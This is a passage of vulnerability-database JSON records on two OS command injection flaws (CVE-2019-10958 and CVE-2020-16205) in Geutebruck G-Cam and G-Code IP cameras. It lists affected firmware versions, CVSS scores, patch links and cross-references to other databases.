          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to network configuration to supply system commands to the server, leading to remote code execution as root. Geutebruck IP Camera G-Code and G-Cam for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          }
        ],
        "trust": 2.43
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-10958",
            "trust": 4.1
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-19-155-03",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "108579",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "id": "VAR-202001-1489",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          }
        ],
        "trust": 1.5020833375
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          }
        ]
      },
      "last_update_date": "2024-12-28T22:51:07.538000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "title": "Patch for Geutebr\u00fcck G-Cam and G-Code OS command injection vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/213555"
          },
          {
            "title": "Multiple Geutebr\u00fcck Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93176"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "OS Command injection (CWE-78) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.5,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10958"
          },
          {
            "trust": 0.9,
            "url": "https://www.geutebrueck.com/en_en.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.securityfocus.com/bid/108579"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "date": "2019-06-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "date": "2020-01-17T18:15:12.260000",
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2024-12-27T03:07:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "date": "2020-01-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "date": "2024-11-21T04:20:14.093000",
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck\u00a0IP\u00a0Camera\u00a0G-Code\u00a0 and \u00a0G-Cam\u00a0 In \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202008-0367

    Vulnerability from variot - Updated: 2024-11-23 22:33

    Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5). G-Cam and G-Code To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Geutebruck GmbH is a German high-tech private company that specializes in designing and producing high-quality, perfectly matched video security solutions.

    Geutebruck IP Cameras certification RCE vulnerability

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202008-0367",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2241",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2250",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ewpc-2270",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code/eec-2400",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code: eec-2xxx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam: ebc-21xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam:efd-22xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam:ethc-22xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam:ewpc-22xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_efd-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_efd-2241_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-code_eec-2400_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-16205",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2020-16205",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-009458",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-14829",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2020-16205",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-009458",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-16205",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-009458",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-14829",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202008-267",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5). G-Cam and G-Code To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Geutebruck GmbH is a German high-tech private company that specializes in designing and producing high-quality, perfectly matched video security solutions. \n\r\n\r\nGeutebruck IP Cameras certification RCE vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-16205",
            "trust": 3.0
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-219-03",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "158888",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2719",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "id": "VAR-202008-0367",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.9440476214285715
      },
      "last_update_date": "2024-11-23T22:33:23.600000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/index.html"
          },
          {
            "title": "Patch for Geutebruck IP Cameras certification RCE vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/251321"
          },
          {
            "title": "Geutebr\u00fcck G-Cam  and G-Code Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=126603"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
